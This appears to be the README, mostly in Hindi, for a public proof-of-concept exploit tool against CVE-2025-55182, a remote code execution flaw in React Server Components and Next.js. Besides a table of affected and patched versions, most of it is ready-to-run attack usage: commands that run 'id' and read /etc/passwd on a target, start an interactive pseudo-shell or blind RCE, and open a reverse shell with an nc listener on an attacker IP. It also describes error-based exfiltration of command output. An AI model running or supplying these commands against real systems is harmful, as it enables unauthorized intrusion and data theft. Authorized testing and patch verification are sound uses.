
CVE-2025-55182 React2Shell PoC - Critical RCE in React Server Components / Next.js. CVSS 10.0. Error-based exfil, reverse shell, interactive mode.
CVE-2025-55182 के लिए प्रूफ ऑफ कॉन्सेप्ट, React सर्वर कंपोनेंट्स में एक गंभीर बिना प्रमाणीकरण के रिमोट कोड निष्पादन भेद्यता।
CVSS स्कोर: 10.0 (गंभीर)
यह भेद्यता React के Flight प्रोटोकॉल डिसीरियलाइज़र में मौजूद है। विशेष रूप से तैयार पेलोड के माध्यम से प्रोटोटाइप प्रदूषण का शोषण करके, एक हमलावर कमजोर Next.js अनुप्रयोगों पर मनमाना कोड निष्पादन प्राप्त कर सकता है।
| उत्पाद | भेद्य | पैच |
|---|---|---|
| React | 19.0.0 - 19.2.0 | 19.0.1, 19.1.2, 19.2.1+ |
| Next.js | 14.3.0-canary.77 - 16.x | 15.0.5, 15.1.9, 15.2.6, 16.0.7+ |
git clone https://github.com/p3ta00/react2shell-poc.git
cd react2shell-poc
pip install requests
आउटपुट सीधे HTTP प्रतिक्रिया में NEXT_REDIRECT त्रुटि के माध्यम से लौटाया जाता है - कोई कॉलबैक सर्वर आवश्यक नहीं।
python3 react2shell-poc.py -t http://TARGET:3000 -c "id"
python3 react2shell-poc.py -t http://TARGET:3000 -c "cat /etc/passwd"
python3 react2shell-poc.py -t http://TARGET:3000 -i
python3 react2shell-poc.py -t http://TARGET:3000 --check
python3 react2shell-poc.py -t http://TARGET:3000 -c "touch /tmp/pwned" --blind
# Start listener
nc -lvnp 4444
# Send payload
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost YOUR_IP --lport 4444
python3 react2shell-poc.py -t http://TARGET:3000 -c "id" --listen --lhost YOUR_IP
-t, --target Target URL (required)
-c, --command Command to execute (output via error-based exfil by default)
--check Check if target is vulnerable
--blind Blind RCE mode (no output capture)
--listen Use callback server instead of error-based exfil
-i, --interactive Interactive pseudo-shell mode
--revshell Attempt reverse shell
--lhost Attacker IP for callbacks/reverse shell
--lport Callback port (default: 9999)
--callback Manual callback URL
--timeout Request timeout in seconds (default: 30)
डिफ़ॉल्ट एक्सफ़िल्ट्रेशन विधि NEXT_REDIRECT त्रुटि इंजेक्शन का उपयोग करती है:
digest फ़ील्ड में आउटपुट के साथ NEXT_REDIRECT त्रुटि फेंकेंयह कॉलबैक-आधारित एक्सफ़िल्ट्रेशन की तुलना में अधिक विश्वसनीय है क्योंकि इसे लक्ष्य से आउटबाउंड नेटवर्क एक्सेस की आवश्यकता नहीं होती है।
यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। कंप्यूटर सिस्टम में अनधिकृत पहुंच अवैध है। परीक्षण से पहले हमेशा उचित प्राधिकरण प्राप्त करें।
p3ta